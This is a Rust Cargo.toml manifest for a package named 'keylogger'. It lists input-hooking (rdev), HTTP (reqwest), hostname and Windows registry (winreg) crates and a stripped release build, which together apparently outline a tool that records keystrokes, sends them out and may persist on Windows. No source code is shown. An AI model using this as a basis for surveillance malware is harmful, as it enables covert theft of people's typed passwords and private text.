[package]
name = "keylogger"
version = "0.1.0"
edition = "2024"

[dependencies]
rdev = "0.5.0"
chrono = "0.4"


reqwest = { version = "0.13", features = ["blocking", "json"] }
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"


hostname = "0.4.2"

[target.'cfg(windows)'.dependencies]
winreg = "0.56"



[profile.release]
lto = true          # Link Time Optimization
codegen-units = 1   # Mejor optimización
strip = true        # Eliminar símbolos de depuración
panic = "abort"
